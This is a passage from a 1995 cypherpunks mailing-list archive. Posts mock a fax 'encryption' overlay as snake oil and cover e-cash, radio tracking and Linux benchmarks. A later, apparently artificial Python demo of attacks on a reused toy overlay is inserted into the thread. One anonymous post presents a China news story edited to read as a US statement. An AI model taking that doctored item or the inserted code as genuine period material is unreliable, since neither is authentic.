	   ( Someone told him he was missing the /, was fun while it lasted )
	.oO( Wonder if he will write a paper on URL grammar now )

> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan L. Bostick)
Date: Mon, 1 Jan 1996 07:08:29 +0800
To: cypherpunks@toad.com
Subject: Is this as insecure as it sounds (was FWD: Complete Fax Privacy Draws C
Message-ID: <199512312219.OAA03598@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This turned up on alt.anonymous.  One would need a technical specification
or a working model to be sure, but it sounds like home-grown snake oil
to me.  My guess is that a nineteenth-century cryptanalyst could crack
this, and that the TLAs would have a field day.

What do other people think?

> 
>                 Complete Fax Privacy Draws Closer
> 
> 
>      Individuals receiving faxes, be they of a business or
> personal nature, will soon be able to encrypt the contents and
> make them unreadable to people for whom the messages are not
> intended.
>      The new fax encryption technology has been developed by the
> University of Rochester in New York.  The encryption program
> would make all faxes unreadable to the naked eye.  Only by
> placing a customized transparent plastic sheet over the message
> could it be made readable.  Each individual, employee or manager
> would be issued with his own plastic sheet and encryption key
> ensuring messages are only read by those specified in the message
> itself.  The encryption software would not slow the transmission
> and reception of fax messages and the cost of installing the
> system on to existing machines would be minimal.
>      Such software would be indispensable to those whose
> activities require the utmost confidentiality or privacy.  Nosy
> employees, rivals, those providing faxing services and anybody
> else who has, until now, had a bird's-eye view of your fax
> communications could be successfully abolished from the security
> equation.
>      Though the software has yet to be refined into a marketable
> commodity, it is set to be introduced for public consumption in
> the very near future.
> 
> 
>      Adam Starchild
>      Asset Protection & Becoming Judgement Proof at
>      http://www.catalog.com/corner/taxhaven
> 
> 
-- 
   Alan Bostick             | SWINDON:   What will history say?
Seeking opportunity to      | BURGOYNE:  History, sir, will tell lies as usual.
develop multimedia content. |    George Bernard Shaw, THE DEVIL'S DISCIPLE
Finger abostick@netcom.com for more info and PGP public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Mon, 1 Jan 1996 07:49:14 +0800
To: "Alan L. Bostick" <abostick@netcom.com>
Subject: Re: Is this as insecure as it sounds (was FWD: Complete Fax Privacy Draws C
In-Reply-To: <199512312219.OAA03598@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.951231144949.12131A-100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain


	Alan:

On Sun, 31 Dec 1995, Alan L. Bostick wrote:

> This turned up on alt.anonymous.  One would need a technical specification
> or a working model to be sure, but it sounds like home-grown snake oil

	Sounds like snake oil to me.

> >                 Complete Fax Privacy Draws Closer
> > personal nature, will soon be able to encrypt the contents and
> > make them unreadable to people for whom the messages are not

	PGP & a fax modem & a good OCR provides this.

	Or PGP the message and either e-mail or telex it.
	
> > placing a customized transparent plastic sheet over the message
> > could it be made readable.  Each individual, employee or manager
> > would be issued with his own plastic sheet and encryption key

	A plastic sheet is going to let me read it, and nobody 
	else?  I guess that would work, if one was using ---
	I've forgotten what it was called, where you cut a number
	of squares on a sheet of cardboard, put over a sheet
	of paper, write the characters in the spaces, then
	lift the sheet, and write garbage to fill up the rest
	of the sheet, so that nobody else can see what the 
	characters were.  I think I was in kindergarten when 
	we did that, until we discovered that our teacher
	could read our "secret" messages, without the cardboard
	sheet.  << The handwriting of the real message differed
	from that of the garbage words. >>

> >      Though the software has yet to be refined into a marketable
> > commodity, it is set to be introduced for public consumption in
> > the very near future.
	
	Is this the same as Jerry Pournelle's "real soon now"?

	I think I'll stick to using PGP and sending e-mail.

        xan

        jonathon
        grafolog@netcom.com



****************************************************************
	
	Opinions represented are not necessarily mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Basspunx@aol.com
Date: Mon, 1 Jan 1996 04:48:01 +0800
To: cypherpunks@toad.com
Subject: put me on the list
Message-ID: <951231150900_103045223@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I would like to be put on the cypherpunks mailing list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 1 Jan 1996 08:07:52 +0800
To: "Alan L. Bostick" <abostick@netcom.com>
Subject: Re: Is this as insecure as it sounds (was FWD: Complete Fax Privacy Draws C
In-Reply-To: <199512312219.OAA03598@netcom17.netcom.com>
Message-ID: <Pine.SOL.3.91.951231151435.902C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


If the plastic sheet is just a fixed mask, then this scheme yields 
instantly to chosen plain-text (just send an all-black page), really 
quickly to known-plaintext, and pretty quickly to multiple cyphertexts.

There's got to be more to it than that.

Simon

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Mon, 1 Jan 1996 08:22:12 +0800
To: cypherpunks@toad.com
Subject: [LOCAL] Next cpx physical meeting in SF Bay area?
Message-ID: <199512312335.PAA27743@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


It's been about a year since I've been to a cpx physical meeting in the SF
area (other than T.C. May's house meeting--thanks again, Tim.  The
AetherWire folks gave a fascinating talk).  I haven't seen much talk here on
the list, either.  Is this still a regular thing?  Back then, we were having
marathon meetings at SGI's IRIS cafe on the first Sat. of the month.  

What goes on these days?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 1 Jan 1996 05:11:34 +0800
To: cypherpunks@toad.com
Subject: (fwd) e$: Looking down, not up, to the future
Message-ID: <v02120d05ad0ca5b74904@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Sender: e$@thumper.vmeng.com
Reply-To: rah@shipwright.com (Robert Hettinga)
Mime-Version: 1.0
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 29 Dec 1995 15:07:53 -0500
Precedence: Bulk
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: e$: Looking down, not up, to the future

-----BEGIN PGP SIGNED MESSAGE-----

e$: Looking down, not up, to the future

12/29/95

First a little administrivia. Going forward, I'm going to be posting my
rants here first at e$@thumper.vmeng.com, with a forward from e$ of the
given rant, after some arbitrary delay, to any other lists that might be
appropriate to the subject. My sponsors have paid for this list, and the
readership of the e$pam and e$ are there to hear what I and others have
to say about e$ and its consequences here, and so my stuff goes onto the
e$ list first from now on. Like all my writing on the net,
redistribution with attribution to me and the other people I cite (when
I remember to cite them all...) here is just fine. If you're publishing
it, and you pay your authors, I'd like to be compensated too, of course.

Not that what I say here is going to be all that earthshaking, but I
thought I'd clear the air a bit.



I've read a lot of interesting things about the future of the net in the
last few weeks, some of which I've sent on to e$pam, and I'd like to
talk about them, by way of clearing the decks for the New Year.

First, I'd like to go revise my model of net.reality a bit.

Most people look at the net as a hierarchy. Architecturally, it is
exactly that, from the IP addressing scheme, to the object
super-hierarchies in component software models, to server-mirroring, to
just about any kind of structural component of the net you would care to
look at.

Physically, big lines get broken up by big switches into smaller lines
which get broken up by smaller switches into smaller lines, in a fractal
process which ends up at you or me, where it goes back up each larger
level to get where it needs to go.

In software, the CORBA object model, and the super-object-model that the
research people have been cooking up at Microsoft, all have a "root"
somewhere; the "top" of their taxonomical system, if you will.

In information, there's a source of the information, and it gets
accreted with other information and synthesized and averaged and
summarized and rolled up into some larger aggregate which allows you to
have some knowledge about that information and other information like it.

In finance, my money gets pooled with other people's money through
several larger aggregation layers and then invested or spent centrally
somewhere. The recipient of capital or cashflow then spends or invests
it in fractally smaller chunks until I get it in a check for something I
do.

I could go on and on with this, but you can see my point, and it is the
same point Rich Lethin loves to use on *me* when I start talking about
"geodesic" anything, that is, the idea that Moore's law exponentially
collapses switching costs, making nodes cheaper than lines, making the
network and the software processes mapped onto it more geodesic instead
of hierarchical, and "surfacting" information and software into
fractally smaller and smaller pieces.

What I've been saying to Rich, particularly when I talk about geodesic
networks, is that the message itself is point-to-point, even though the
actual electrons may flow more or less hierarchically around the
network. That's kept him busy while I made my getaway. It always felt
like a sophistic shuck, myself, but I'd learned to live with it until
now.

I don't know if I've gotten anywhere, but I've been thinking about it a
bit, thrashing analogies from other parts of the world, --the major way
I think, unfortunately -- to describe what I see out there. I've been
thinking about biological models, because in my stranger moments, I like
to pretend that the net is an electro-biological entity.

For instance, the circulation of blood is a good analogy, I think,
because all the endocrine messages in the blood stream are ultimately
broadcast from a single cell and paradoxically sent point to point to
another cell -- just like things are on an ethernet wire, or on Gilder's
fanciful dark fiber, even though the circulatory "backbone" is
hierarchical.

The most obvious example of course is the organization of neurons, in
that the brain pathways are essentially geodesic, but we still have to
deal with the hierarchy of nerves outside of the brain.

The one thing I think that differentiates these models from the
hierarchies we encounter in social life, the industrial induced control
hierarchies we all rail against, and the stuff I like to quixotically do
battle with on the net, is that every one of those biological
hierarchies is chaotic. There is no pretense of top-down control of the
system. The load of the system is hierarchical, and so the system
organizes itself hierarchically. There are physical forces which create
physically hierarchical structures, but they're usually set up to solve
the problem of efficient distribution of something over a distance, like
draining a watershed, or getting blood to a central heart and lungs, or
nerve impulses back and forth to the brain.

When distance isn't a problem, networks, like the brain, tend to get
more geodesic. Bandwidth is maintained by an abundance of neuronic
"switches", doubling as processors, tripling as memory, each with some
number of connections to other neurons, rather than a bunch of "fat"
neurons doing all the signal processing. As an exception which proves the
rule, note there *are* in fact "fat" neurons, more precisely redundant
neuron pathways, particularly between the two halves of the brain, and
between the brain and the rest of the body.

So, what else is new? We still have hierarchies on the net, right? We're
about to bump up by many orders of magnitude the number of possible IP
addresses real soon, so that someday your toaster can tell your alarm
clock to wake you for breakfast. I've ranted, tongue-in-cheek, about the
"dangers" of the "X.blabla" book-entry view of the world, with
hierarchical, government-as-root certification "authorities", and the
consequences of having an audit trail on your every net-based financial
activity. Most of this X.blabla stuff will come to pass, mostly because
it's the easiest thing for the financial system as it's currently
organized to do. It's sort of like financial "shovelware", moving the
contents of one financial medium, the hierarchic industrial paradigm of
government regulated central banking systems onto the new medium of the
internet.

However, in a world of micro-pay-as-you-go packet routing, where routers
may someday spot-auction their bandwidth on a demand basis at packet
prices displayed best in scientific notation, all those audit threads
could lead to a Gulliverian restraint on personal freedom, much less on
individual privacy.

Fortunately, I don't think that's going to happen, because those same
Lilliputian audit trails will just get in the way and slow the system to
a standstill. We need to get more chaotic.

I think my contention on this is that as we get smaller and smaller, the
more chaotic it's going to have to be. Book-entry based transaction
processing systems will choke on their own accounting at those levels.
To look at the extremely-hypothetical router above, it will be easier to
attach some digital bearer microcertificates to an information packet,
so that the packet pays its way through all the routers it needs to go
to, than it will be for some giant book entry system to account for it
all. People have said that those microcertificates could work like
stamps, where the first router cancels the stamp and pays back the other
routers in the route some fraction of the "stamp" price to be settled
later, or it may be possible to simply endow a packet with all the
certificates necessary to get from point to point in a network someday. It
kind of reminds me of digital cash-as-processor-food, a bit.

Note that this kind of bio-economic thinking is not new, the Agorics
folks and Stewart Brand have been talking about this stuff for quite a
while. My point here is that "down" the network, not up, is the place to
look for the interesting stuff in the future.

There are several interesting micropayment certificate systems out
there, and there will be more. As software gets smaller and smaller with
component architectures like OpenDoc and its eventual successors, it
will be more and more economic to charge ridiculously smaller and
smaller amounts for ridiculously smaller and smaller network behaviors.
Just wait until someone figures how to get software to really "evolve",
or gets software to write other software on a practical basis.


Most of the people I read, on the net or off, don't see this. They're
looking "up" the net, how connections are made up, at the level of the
grosser network features, like how monolithic corporations, or
book-entry database and financial control systems, or government
regulations, will happen on the net. How the net will integrate itself
with the "real" world they're familiar with.

8 years ago, I used to talk about people who lived "on" microcomputers
versus the ones who lived "in" them. I used to say that Macs were more
for people who lived "in" computers because they weren't hindered by the
mechanics of the interface so much. I think that there are still a lot
of mainframe-cum-client/server folks out there who still live "on" the
net, and not in it. Those are the people who are looking "up" at how the
"big" players will behave, when they should be looking at their feet, where
the real action is.

Where the very ground is in the process of dissolving out from under
them.

Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMORJaPgyLN8bw6ZVAQG+WQP/X4j2qn9tnhDoJKdqctxBCoQzH4F//kKc
zsau7Cxs49XGHAaoZo2Pk2svU79FWG7HyWsm0VAPR9ezHiWf8W/Tyi1NgxCkNwjo
62HFNsE0U6Rfo0Itd26WuICe9aC2SG5J6tX8+MzJZqHzzx2xhBUNPKFqt/ZwVtFZ
KNLAGkM/7Hg=
=jc3o
-----END PGP SIGNATURE-----

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here! Be a charter sponsor for e$pam, e$, and Ne$ws!
e-mail rah@shipwright.com for details...
-------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 1 Jan 1996 09:23:16 +0800
To: cypherpunks@toad.com
Subject: Re: Is this as insecure... (really "Fax crypto")
Message-ID: <199601010018.QAA01779@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Shamir did a talk on fax crypto in May, 1994.  There is no reason that this
can't be completely secure, the overlays could be one-time pads.   Bill
Sommerfeld posted a description of the technique to the list after he went
to a presentation on the technique, I'll forward it to anybody that needs
a copy.

Using the same overlay multiple times, though, would make it completely
insecure.  I can't believe that they are recommending that that could
be a possibility.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                  (408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 
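
Added example (not part of any post in this thread): the fixed-mask attacks Simon Spero lists and the one-time-overlay fix Thaddeus Beier describes, with the overlay modelled as a per-pixel XOR over a 1-bit bitmap. The XOR model, the 16x8 page size, the two constructed sample pages and every function name are assumptions made for illustration; the announcement gives no specification of the real scheme.

```python
import secrets

WIDTH, HEIGHT = 16, 8                 # constructed toy page size, in pixels
NBITS = WIDTH * HEIGHT
ALL_BLACK = (1 << NBITS) - 1          # the chosen plaintext: every pixel black


def page_from_rows(rows):
    """Pack rows of '#' (black) and '.' (white) into one integer bitmap."""
    if len(rows) != HEIGHT or any(len(r) != WIDTH for r in rows):
        raise ValueError("page must be %dx%d pixels" % (WIDTH, HEIGHT))
    return int("".join("1" if ch == "#" else "0" for r in rows for ch in r), 2)


def rows_from_page(page):
    """Inverse of page_from_rows, for printing a bitmap."""
    bits = format(page, "0%db" % NBITS)
    return [bits[i:i + WIDTH].replace("1", "#").replace("0", ".")
            for i in range(0, NBITS, WIDTH)]


# Two constructed sample pages (not real fax data).
ROWS_A = ["################", "#..............#", "#..####..####..#",
          "#..#..#..#..#..#", "#..####..####..#", "#..............#",
          "#..............#", "################"]
ROWS_B = ["................", "..##........##..", "..##........##..",
          "................", ".#............#.", "..#..........#..",
          "...##########...", "................"]
PAGE_A, PAGE_B = page_from_rows(ROWS_A), page_from_rows(ROWS_B)


def new_overlay():
    """A fresh uniformly random overlay, one bit per pixel."""
    return secrets.randbits(NBITS)


def apply_overlay(page, overlay):
    """Encrypt or decrypt a page; XOR is its own inverse."""
    return page ^ overlay


def recover_overlay_chosen(encrypt):
    """Chosen plaintext: an all-black page comes back as the inverted overlay."""
    return encrypt(ALL_BLACK) ^ ALL_BLACK


def recover_overlay_known(page, cipher):
    """Known plaintext: one (page, ciphertext) pair gives the overlay used."""
    return page ^ cipher


def fixed_overlay_results():
    """One overlay reused for every page: all three weaknesses apply."""
    overlay = new_overlay()

    def encrypt(page):
        return apply_overlay(page, overlay)

    c_a, c_b = encrypt(PAGE_A), encrypt(PAGE_B)
    from_known = recover_overlay_known(PAGE_A, c_a)
    return {
        "chosen_plaintext_recovers_overlay":
            recover_overlay_chosen(encrypt) == overlay,
        "known_plaintext_reads_other_page":
            apply_overlay(c_b, from_known) == PAGE_B,
        # The overlay cancels, leaving PAGE_A xor PAGE_B with no key at all.
        "two_ciphertexts_leak_difference": (c_a ^ c_b) == (PAGE_A ^ PAGE_B),
    }


def one_time_overlay_results():
    """A fresh overlay per page: what is learned from page A says nothing about B."""
    c_a = apply_overlay(PAGE_A, new_overlay())
    c_b = apply_overlay(PAGE_B, new_overlay())
    guess = recover_overlay_known(PAGE_A, c_a)   # valid for page A only
    return {
        "known_plaintext_reads_other_page":
            apply_overlay(c_b, guess) == PAGE_B,
        "two_ciphertexts_leak_difference": (c_a ^ c_b) == (PAGE_A ^ PAGE_B),
    }


if __name__ == "__main__":
    print("fixed overlay:   ", fixed_overlay_results())
    print("one-time overlay:", one_time_overlay_results())
    print("what two reused-overlay ciphertexts reveal (A xor B):")
    print("\n".join(rows_from_page(PAGE_A ^ PAGE_B)))
```

With a reused overlay every check comes back True; with a fresh overlay per page the same checks come back False, except with probability 2^-128 for this page size.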




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Mon, 1 Jan 1996 07:50:56 +0800
To: cypherpunks@toad.com
Subject: Re: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt]
Message-ID: <199512312305.RAA21699@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>think I underestimated how hard things could get.  If you're just
>trying to track a frequency-hopping signal where the rest of the power
>in the band is some mix of Gaussian noise and non-hopping signals, the
>carrier should be clearly visible as a spike hopping around in the
>band.  As soon as you have two or more frequency-hopping signals
>however, keeping track of which carrier is which as they hop around
>looks *much* harder.  If they hop at discernibly different times then
>you can correlate a carrier that disappeared with the one that appeared
>elsewhere at the same time.  This easily described and implemented
>approach breaks down when two or more signals hop at the same time.
>Here you might try to associate some sort of signature with each signal
>to allow you to pair up the new carriers with the old, but you'd have
>to know more about the situation to say what signatures would be good.
>
RF finger-printing would do the trick.  Any and all RF equipment has its own
RF fingerprint no matter how closely they are made at the factory.  Now
having equipment to RF fingerprint and identify that fingerprint fast enough
is another story!  

                        Dr0id

(andr0id@midwest.net  callsign: N9XLM)
( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 1 Jan 1996 07:32:05 +0800
To: cypherpunks@toad.com
Subject: Re: Can We Cut the Crap?
In-Reply-To: <ad0c14fb020210041a1c@[205.199.118.202]>
Message-ID: <NoVZgD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> There is no point in the back-and-forth of insults, "Dr. Fred is a loon,"
> "Alice is Detweiler," and other such nonsense. If you don't want to read
> the comments of Fred Cohen, Dimitri Vulis, Alice whatever,
> Vlad/Lance/Larry/Pablo, then just don't read them! Filter them out, delete
> them immediately, read them briefly, whatever.

Or Chris Shalutis, or Ed Carp, or Perry Metzger...

Too bad majordomo@toad.com can't be instructed not to send contributions from
certain folks to certain other folks.  I guess I'll have to figure out how
to use procmail with this thing after all.

Happy New Year,

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 1 Jan 1996 11:42:33 +0800
To: nobody@tjava.com
Subject: Re: US calls for measures against Internet porn
In-Reply-To: <199601010034.SAA07422@tjava.com>
Message-ID: <czz5w8m9LYvL085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199601010034.SAA07422@tjava.com>,
nobody@tjava.com (Anonymous) wrote:

> Apologies if you've seen this before:
> 
>          WASHINGTON DC (Reuter) - The US called Sunday for improved
> management of the Internet to prevent people seeing pornographic
> material on the world computer network.
>          A joint statement from the Clinton administration's State
> Council (Cabinet) and the office of the Republican Party's Planning
> Committee said there were increasing links between domestic computer
> systems and the Internet.
>          ``Good use of the Internet is of great importance to increase
> global information exchanges, promote economic construction and
> develop science,'' the Associated Press quoted the statement as
> saying.
>          But because of weak management and lack of control over what
> enters the Internet, some pornographic and other harmful materials
> have come onto the system, it said. ``We must take effective measures
> to deal with this,'' it said.
>          German prosecutors said Friday they had launched an
> investigation into the U.S.-based online service CompuServe Inc on
> suspicion that members had sent child pornography over its worldwide
> computer network.
>          The inquiry prompted the service to block access to 200
> sexually-explicit Internet discussion groups and sites where
> pornographic pictures are available.
>          An explosion in use and ownership of modems in the US is
> giving an increasingly large number of people access to the Internet.
> 
> [The amazing thing is how _little_ editing was necessary.]
> 

Ummm.  Wasn't it *China* in today's original?

- -- 
   Alan Bostick             | SWINDON:   What will history say?
Seeking opportunity to      | BURGOYNE:  History, sir, will tell lies as usual.
develop multimedia content. |    George Bernard Shaw, THE DEVIL'S DISCIPLE
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMOc9A+VevBgtmhnpAQFjOAL/d4U3rPqsYG6Bkzv1JWX8uoePdYCxZTGf
/AnOLH1vSw2ZEJ3oNDTiLxjM4uuoWHjAOzJRer7aAb1UuoCT1wm3+aEQNSk83Jg6
jMRFZtri5nj2LKTD2u6T19wqydYZ6zBl
=aYBC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tjava.com (Anonymous)
Date: Mon, 1 Jan 1996 08:26:11 +0800
To: cypherpunks@toad.com
Subject: US calls for measures against Internet porn
Message-ID: <199601010034.SAA07422@tjava.com>
MIME-Version: 1.0
Content-Type: text/plain


Apologies if you've seen this before:

         WASHINGTON DC (Reuter) - The US called Sunday for improved
management of the Internet to prevent people seeing pornographic
material on the world computer network.
         A joint statement from the Clinton administration's State
Council (Cabinet) and the office of the Republican Party's Planning
Committee said there were increasing links between domestic computer
systems and the Internet.
         ``Good use of the Internet is of great importance to increase
global information exchanges, promote economic construction and
develop science,'' the Associated Press quoted the statement as
saying.
         But because of weak management and lack of control over what
enters the Internet, some pornographic and other harmful materials
have come onto the system, it said. ``We must take effective measures
to deal with this,'' it said.
         German prosecutors said Friday they had launched an
investigation into the U.S.-based online service CompuServe Inc on
suspicion that members had sent child pornography over its worldwide
computer network.
         The inquiry prompted the service to block access to 200
sexually-explicit Internet discussion groups and sites where
pornographic pictures are available.
         An explosion in use and ownership of modems in the US is
giving an increasingly large number of people access to the Internet.

[The amazing thing is how _little_ editing was necessary.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 31 Dec 1995 16:44:18 +0800
To: puke@suburbia.net
Subject: (fwd) Benchmarks - revs 1.3.50 & 51
Message-ID: <199512310736.SAA06119@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


Path: news.apana.org.au!goliath.apana.org.au!sysx.apana.org.au!sleeper.apana.org.au!greathan.apana.org.au!news-mail-gateway
From: fluido@marktest.pt (Carlo Emilio Prelz)
Newsgroups: apana.lists.os.linux.kernel
Subject: Benchmarks - revs 1.3.50 & 51
Date: Thu, 28 Dec 1995 08:05:17 +0100 (MET)
Organization: Mail-to-News Gateway
Lines: 158
Sender: daemon@greathan.apana.org.au
Approved: usenet@greathan.apana.org.au
Distribution: apana
Message-ID: <Pine.LNX.3.91.951228075225.11217A-100000@pimpinel.fluido.org>
NNTP-Posting-Host: greathan.apana.org.au

Hi. Here follow the benchmark comparisons w.r.t. revisions 50 & 51. I
decided to wait before posting rev 50 because the file read &
write results again bounced up with it, and I spent some (very little)
time trying to see if I could have done anything to cause that. With
no results, as usual. Now I also have results for the "greased
weasel", and I decided to send out my numbers for what they're
worth. Not much has changed with the latest release...

I repeat my query: if anybody has suggestions about these huge jumps in 
disk performance, please let me know. I am ALWAYS running the benchmark 
test after a reboot. I login as root, start the process in background and 
log out, and then generally go to sleep. The machine is NOT online, and 
is not doing anything important at night. I have not changed anything in 
the kernel config in the latest 3 revisions. I have a plain old ISA
disk controller, and two generally fullish disks, but again, the
situation did not change notably between 1.3.49 and 1.3.50.

And, I now have to admit that I find it faster, for example, to load a 
huge C file into emacs, and have it do the syntax coloring. I noticed it 
this morning. 

No problems in patching & compiling.

--8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<--

From:
* Linux pimpinel.fluido.org 1.3.49 #77 Fri Dec 22 21:05:57 MET 1995 i486
* Fri Dec 22 21:41:03 MET 1995

To:
* Linux pimpinel.fluido.org 1.3.50 #78 Mon Dec 25 11:18:00 MET 1995 i486
* Mon Dec 25 12:11:11 MET 1995

*******
Results
*******

File Write (30 seconds)                ||   1000.0 ->   9460.0  +846.00%
File Write (10 seconds)                ||   1200.0 ->   8070.0  +572.50%
File Copy  (30 seconds)                ||    968.0 ->   2636.0  +172.31%
File Copy  (10 seconds)                ||   1024.0 ->   2645.0  +158.30%
Execl Throughput Test                  ||     67.9 ->     85.3   +25.63%
C Compiler Test                        ||     48.7 ->     51.9    +6.57%
Pipe-based Context Switching Test      ||   9863.0 ->  10493.0    +6.39%
Process Creation Test                  ||    347.7 ->    368.9    +6.10%
Shell scripts (1 concurrent)           ||     96.4 ->    101.9    +5.71%
Shell scripts (4 concurrent)           ||     25.5 ->     26.5    +3.92%
Shell scripts (2 concurrent)           ||     50.8 ->     52.6    +3.54%
System Call Overhead Test              ||  29945.4 ->  30523.5    +1.93%
Dhrystone 2 using register variables   ||  49658.9 ->  49910.8    +0.51%
Arithmetic Test (type = int)           ||   8365.0 ->   8377.5    +0.15%
Arithmetic Test (type = double)        ||   5063.6 ->   5071.1    +0.15%
Recursion Test--Tower of Hanoi         ||    726.1 ->    727.1    +0.14%
Arithmetic Test (type = arithoh)       || 127103.2 -> 127265.6    +0.13%
Arithmetic Test (type = short)         ||   7508.8 ->   7515.5    +0.09%
Arithmetic Test (type = register)      ||   8367.3 ->   8372.8    +0.07%
Arithmetic Test (type = float)         ||   5066.8 ->   5069.3    +0.05%
Arithmetic Test (type = long)          ||   8371.8 ->   8372.1    +0.00%
Shell scripts (8 concurrent)           ||     13.0 ->     13.0    +0.00%
Pipe Throughput Test                   ||  17850.0 ->  17726.9    -0.69%
Dhrystone 2 without register variables ||  51001.9 ->  49772.1    -2.41%
File Read  (30 seconds)                ||   4613.0 ->   4404.0    -4.53%
File Read  (10 seconds)                ||   4648.0 ->   4390.0    -5.55%
Dc: sqrt(2) to 99 decimal places       ||  11886.7 ->  10822.2    -8.96%

--8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<--

From:
* Linux pimpinel.fluido.org 1.3.50 #78 Mon Dec 25 11:18:00 MET 1995 i486
* Mon Dec 25 12:11:11 MET 1995

To:
* Linux pimpinel.fluido.org 1.3.51 #79 Wed Dec 27 19:16:06 MET 1995 i486
* Wed Dec 27 22:41:23 MET 1995

*******
Results
*******

File Read  (30 seconds)                ||   4404.0 ->   4548.0    +3.27%
File Read  (10 seconds)                ||   4390.0 ->   4516.0    +2.87%
Dc: sqrt(2) to 99 decimal places       ||  10822.2 ->  11034.2    +1.96%
Process Creation Test                  ||    368.9 ->    375.0    +1.65%
File Copy  (10 seconds)                ||   2645.0 ->   2683.0    +1.44%
File Copy  (30 seconds)                ||   2636.0 ->   2669.0    +1.25%
Shell scripts (4 concurrent)           ||     26.5 ->     26.8    +1.13%
C Compiler Test                        ||     51.9 ->     52.4    +0.96%
Dhrystone 2 without register variables ||  49772.1 ->  49808.7    +0.07%
Arithmetic Test (type = long)          ||   8372.1 ->   8376.6    +0.05%
Arithmetic Test (type = register)      ||   8372.8 ->   8376.1    +0.04%
Arithmetic Test (type = float)         ||   5069.3 ->   5069.9    +0.01%
Arithmetic Test (type = short)         ||   7515.5 ->   7515.7    +0.00%
Shell scripts (8 concurrent)           ||     13.0 ->     13.0    +0.00%
Arithmetic Test (type = double)        ||   5071.1 ->   5067.4    -0.07%
Arithmetic Test (type = arithoh)       || 127265.6 -> 127172.0    -0.07%
Dhrystone 2 using register variables   ||  49910.8 ->  49870.6    -0.08%
Arithmetic Test (type = int)           ||   8377.5 ->   8370.4    -0.08%
Recursion Test--Tower of Hanoi         ||    727.1 ->    724.3    -0.39%
Shell scripts (2 concurrent)           ||     52.6 ->     52.3    -0.57%
Shell scripts (1 concurrent)           ||    101.9 ->    101.2    -0.69%
File Write (30 seconds)                ||   9460.0 ->   9356.0    -1.10%
Pipe Throughput Test                   ||  17726.9 ->  17227.1    -2.82%
Pipe-based Context Switching Test      ||  10493.0 ->  10194.8    -2.84%
System Call Overhead Test              ||  30523.5 ->  29476.8    -3.43%
Execl Throughput Test                  ||     85.3 ->     81.5    -4.45%
File Write (10 seconds)                ||   8070.0 ->   7680.0    -4.83%

--8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<--

From:
